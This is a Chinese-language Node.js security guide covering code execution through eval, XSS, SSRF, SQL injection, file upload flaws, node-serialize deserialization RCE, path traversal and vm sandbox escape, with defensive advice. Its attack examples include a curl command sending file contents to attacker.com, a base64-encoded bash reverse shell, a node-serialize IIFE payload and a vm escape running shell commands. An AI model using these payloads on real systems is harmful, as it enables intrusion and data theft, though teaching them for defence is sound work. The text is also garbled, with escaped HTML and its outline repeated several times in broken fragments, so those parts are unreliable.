Node.js 安全漏洞分析与防护指南<\/h1>

前言<\/h2>
本文总结了Node.js应用中常见的安全漏洞类型及其防护措施，包括HTTP头安全设置、代码执行、XSS、SSRF、SQL注入、文件上传漏洞，以及npm模块相关安全问题。<\/p>

1. 设置安全的HTTP头<\/h2>

关键HTTP头<\/h3>

Strict-Transport-Security<\/code>: 强制使用HTTPS安全连接<\/li>
X-Frame-Options<\/code>: 防止点击劫持<\/li>
X-XSS-Protection<\/code>: 开启浏览器XSS过滤<\/li>
X-Content-Type-Options<\/code>: 防止MIME类型混淆<\/li>

Content-Security-Policy<\/code>: 防止XSS和其他注入攻击<\/li>
<\/ul>
实现方式<\/h3>
使用helmet<\/code>模块可一键配置所有安全HTTP头：<\/p>
var<\/span> express<\/span> =<\/span> require<\/span>('express'<\/span>);
<\/span><\/span>var<\/span> helmet<\/span> =<\/span> require<\/span>('helmet'<\/span>);
<\/span><\/span>var<\/span> app<\/span> =<\/span> express<\/span>();
<\/span><\/span>app<\/span>.use<\/span>(helmet<\/span>());
<\/span><\/span><\/code><\/pre>2. 代码执行漏洞<\/h2>
危险函数<\/h3>

eval()<\/code><\/li>
setInterval()<\/code><\/li>
setTimeout()<\/code><\/li>
new Function()<\/code><\/li>
<\/ul>
漏洞示例<\/h3>
app<\/span>.get<\/span>('\/eval'<\/span>, function<\/span>(req<\/span>, res<\/span>){
<\/span><\/span>    res<\/span>.send<\/span>(eval(req<\/span>.query<\/span>.code<\/span>)); \/\/ 直接执行用户输入
<\/span><\/span><\/span><\/span>});
<\/span><\/span><\/code><\/pre>攻击方式<\/h3>

执行系统命令<\/strong>:<\/li>
<\/ol>
code<\/span>=<\/span>require<\/span>('child_process'<\/span>).exec<\/span>('open \/Applications\/WeChat.app'<\/span>);
<\/span><\/span><\/code><\/pre>
读取任意文件<\/strong>(通过数据外带):<\/li>
<\/ol>
code<\/span>=<\/span>require<\/span>('child_process'<\/span>).exec<\/span>('curl -d "content=`cat \/path\/to\/file`" http:\/\/attacker.com\/test.php'<\/span>);
<\/span><\/span><\/code><\/pre>
反弹shell<\/strong>:<\/li>
<\/ol>
code<\/span>=<\/span>require<\/span>('child_process'<\/span>).exec<\/span>('YmFzaCAtaSAmZ3Q7JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwJmd0OyYx'<\/span>|<\/span>base64<\/span> -<\/span>d<\/span>|<\/span>bash<\/span>'<\/span>);
<\/span><\/span><\/code><\/pre>替代方案<\/h3>
当没有require<\/code>时，可使用:<\/p>
global<\/span>.process<\/span>.mainModule<\/span>.constructor<\/span>._load<\/span>('child_process'<\/span>).exec<\/span>(''<\/span>)
<\/span><\/span><\/code><\/pre>3. XSS漏洞<\/h2>
漏洞原因<\/h3>
Node.js缺乏内置的XSS防护机制，直接输出用户输入会导致XSS。<\/p>
漏洞示例<\/h3>
app<\/span>.get<\/span>('\/xss'<\/span>, function<\/span>(req<\/span>, res<\/span>){
<\/span><\/span>    res<\/span>.end<\/span>(req<\/span>.query<\/span>.content<\/span>); \/\/ 未过滤直接输出
<\/span><\/span><\/span><\/span>});
<\/span><\/span><\/code><\/pre>防护措施<\/h3>

设置X-XSS-Protection<\/code>头<\/li>
对所有输出进行HTML实体编码<\/li>
使用模板引擎的自动转义功能<\/li>
<\/ol>
4. SSRF漏洞<\/h2>
漏洞示例<\/h3>
app<\/span>.get<\/span>('\/ssrf'<\/span>, function<\/span>(req<\/span>, res<\/span>){
<\/span><\/span>    var<\/span> url<\/span> =<\/span> req<\/span>.query<\/span>['url'<\/span>];
<\/span><\/span>    needle<\/span>.get<\/span>(url<\/span>); \/\/ 直接请求用户提供的URL
<\/span><\/span><\/span><\/span>    res<\/span>.end<\/span>('new request:'<\/span>+<\/span>url<\/span>);
<\/span><\/span>});
<\/span><\/span><\/code><\/pre>防护措施<\/h3>

验证用户提供的URL<\/li>
限制访问内网IP<\/li>
使用白名单机制<\/li>
<\/ol>
5. SQL注入<\/h2>
漏洞示例<\/h3>
app<\/span>.get<\/span>('\/sqli'<\/span>, function<\/span>(req<\/span>, res<\/span>){
<\/span><\/span>    var<\/span> id<\/span> =<\/span> req<\/span>.query<\/span>.id<\/span>;
<\/span><\/span>    var<\/span> sql<\/span> =<\/span> "select * from user where id="<\/span>+<\/span>id<\/span>; \/\/ 直接拼接SQL
<\/span><\/span><\/span><\/span>    connection<\/span>.query<\/span>(sql<\/span>,function<\/span>(error<\/span>, result<\/span>){
<\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>    });
<\/span><\/span>});
<\/span><\/span><\/code><\/pre>防护措施<\/h3>

使用参数化查询<\/li>
使用ORM框架<\/li>
最小权限原则设置数据库用户<\/li>
<\/ol>
6. 文件上传漏洞<\/h2>
漏洞示例<\/h3>
app<\/span>.post<\/span>('\/upload'<\/span>, function<\/span>(req<\/span>, res<\/span>) {
<\/span><\/span>    var<\/span> des_file<\/span> =<\/span> __dirname<\/span> +<\/span> "\/"<\/span> +<\/span> req<\/span>.files<\/span>[0<\/span>].originalname<\/span>;
<\/span><\/span>    fs<\/span>.writeFile<\/span>(des_file<\/span>, data<\/span>, function<\/span>(err<\/span>) {
<\/span><\/span>        \/\/ 未验证文件类型和内容
<\/span><\/span><\/span><\/span>    });
<\/span><\/span>});
<\/span><\/span><\/code><\/pre>防护措施<\/h3>

验证文件类型和内容<\/li>
随机化文件名<\/li>
设置文件上传目录不可执行<\/li>
<\/ol>
7. npm模块安全问题<\/h2>
7.1 node-serialize反序列化RCE漏洞(CVE-2017-5941)<\/h3>
漏洞原理<\/h4>
利用IIFE(立即调用函数表达式)在反序列化时执行任意代码。<\/p>
POC生成<\/h4>
serialize<\/span> =<\/span> require<\/span>('node-serialize'<\/span>);
<\/span><\/span>var<\/span> test<\/span> =<\/span> {
<\/span><\/span>    rce<\/span>:<\/span> function<\/span>(){
<\/span><\/span>        require<\/span>('child_process'<\/span>).exec<\/span>('whoami'<\/span>);
<\/span><\/span>    },
<\/span><\/span>};
<\/span><\/span>console<\/span>.log<\/span>(serialize<\/span>.serialize<\/span>(test<\/span>));
<\/span><\/span><\/code><\/pre>恶意payload<\/h4>
{"rce"<\/span>:<\/span>"_
<\/span><\/span><\/span>$$
<\/span><\/span><\/span>ND_FUNC
<\/span><\/span><\/span>$$
<\/span><\/span><\/span>_function(){require('child_process').exec('whoami');}()"<\/span>}
<\/span><\/span><\/code><\/pre>7.2 Node.js目录穿越漏洞(CVE-2017-14849)<\/h3>
影响版本<\/h4>

Node.js 8.5.0 + Express 3.19.0-3.21.2<\/li>
Node.js 8.5.0 + Express 4.11.0-4.15.5<\/li>
<\/ul>
漏洞原理<\/h4>
normalize()<\/code>函数规范化路径时未正确处理目录跳转字符(如..\/<\/code>)。<\/p>
7.3 vm沙盒逃逸<\/h3>
漏洞示例<\/h4>
const<\/span> vm<\/span> =<\/span> require<\/span>('vm'<\/span>);
<\/span><\/span>const<\/span> context<\/span> =<\/span> { x<\/span>:<\/span>2<\/span> };
<\/span><\/span>const<\/span> script<\/span> =<\/span> new<\/span> vm<\/span>.Script<\/span>(`
<\/span><\/span><\/span>    this.constructor.constructor('return process')().mainModule.require('child_process').execSync('whoami').toString()
<\/span><\/span><\/span>`<\/span>);
<\/span><\/span>vm<\/span>.createContext<\/span>(context<\/span>);
<\/span><\/span>script<\/span>.runInContext<\/span>(context<\/span>);
<\/span><\/span><\/code><\/pre>逃逸原理<\/h4>
通过原型链(this.__proto__<\/code>)访问主环境的Object.prototype<\/code>和process<\/code>对象。<\/p>
8. 参考链接<\/h2>

Node.js安全最佳实践<\/a><\/li>
Node.js常见漏洞分析<\/a><\/li>
CVE-2017-14849分析<\/a><\/li>
Node.js安全总结<\/a><\/li>
Node.js官方文档<\/a><\/li>
<\/ol>

Node.js 安全漏洞分析与防护指南<\/h1>

前言<\/h2>
本文总结了Node.js应用中常见的安全漏洞类型及其防护措施，包括HTTP头安全设置、代码执行、XSS、SSRF、SQL注入、文件上传漏洞，以及npm模块相关安全问题。<\/p>

1. 设置安全的HTTP头<\/h2>

2. 代码执行漏洞<\/h2>

3. XSS漏洞<\/h2>

漏洞原因<\/h3>
Node.js缺乏内置的XSS防护机制，直接输出用户输入会导致XSS。<\/p>

4. SSRF漏洞<\/h2>

5. SQL注入<\/h2>

6. 文件上传漏洞<\/h2>

7. npm模块安全问题<\/h2>

7.1 node-serialize反序列化RCE漏洞(CVE-2017-5941)<\/h3>

漏洞原理<\/h4>
利用IIFE(立即调用函数表达式)在反序列化时执行任意代码。<\/p>

7.2 Node.js目录穿越漏洞(CVE-2017-14849)<\/h3>

漏洞原理<\/h4>
`normalize()<\/code>函数规范化路径时未正确处理目录跳转字符(如..\/<\/code>)。<\/p>`

逃逸原理<\/h4>
通过原型链(`this.proto<\/code>)访问主环境的Object.prototype<\/code>和process<\/code>对象。<\/p>`

`8. 参考链接<\/h2> Node.js安全最佳实践<\/a><\/li> Node.js常见漏洞分析<\/a><\/li> CVE-2017-14849分析<\/a><\/li> Node.js安全总结<\/a><\/li> Node.js官方文档<\/a><\/li> <\/ol>`

Node.js 安全漏洞分析与防护指南<\/h1>

前言<\/h2> 本文总结了Node.js应用中常见的安全漏洞类型及其防护措施，包括HTTP头安全设置、代码执行、XSS、SSRF、SQL注入、文件上传漏洞，以及npm模块相关安全问题。<\/p>

1. 设置安全的HTTP头<\/h2>

2. 代码执行漏洞<\/h2>

3. XSS漏洞<\/h2>

漏洞原因<\/h3> Node.js缺乏内置的XSS防护机制，直接输出用户输入会导致XSS。<\/p>

4. SSRF漏洞<\/h2>

5. SQL注入<\/h2>

6. 文件上传漏洞<\/h2>

7. npm模块安全问题<\/h2>

7.1 node-serialize反序列化RCE漏洞(CVE-2017-5941)<\/h3>

漏洞原理<\/h4> 利用IIFE(立即调用函数表达式)在反序列化时执行任意代码。<\/p>

7.2 Node.js目录穿越漏洞(CVE-2017-14849)<\/h3>

漏洞原理<\/h4> normalize()<\/code>函数规范化路径时未正确处理目录跳转字符(如..\/<\/code>)。<\/p>

逃逸原理<\/h4> 通过原型链(this.__proto__<\/code>)访问主环境的Object.prototype<\/code>和process<\/code>对象。<\/p>

8. 参考链接<\/h2> Node.js安全最佳实践<\/a><\/li> Node.js常见漏洞分析<\/a><\/li> CVE-2017-14849分析<\/a><\/li> Node.js安全总结<\/a><\/li> Node.js官方文档<\/a><\/li> <\/ol>

前言<\/h2>
本文总结了Node.js应用中常见的安全漏洞类型及其防护措施，包括HTTP头安全设置、代码执行、XSS、SSRF、SQL注入、文件上传漏洞，以及npm模块相关安全问题。<\/p>

漏洞原因<\/h3>
Node.js缺乏内置的XSS防护机制，直接输出用户输入会导致XSS。<\/p>

漏洞原理<\/h4>
利用IIFE(立即调用函数表达式)在反序列化时执行任意代码。<\/p>

漏洞原理<\/h4>
`normalize()<\/code>函数规范化路径时未正确处理目录跳转字符(如..\/<\/code>)。<\/p>`

逃逸原理<\/h4>
通过原型链(`this.proto<\/code>)访问主环境的Object.prototype<\/code>和process<\/code>对象。<\/p>`

`8. 参考链接<\/h2> Node.js安全最佳实践<\/a><\/li> Node.js常见漏洞分析<\/a><\/li> CVE-2017-14849分析<\/a><\/li> Node.js安全总结<\/a><\/li> Node.js官方文档<\/a><\/li> <\/ol>`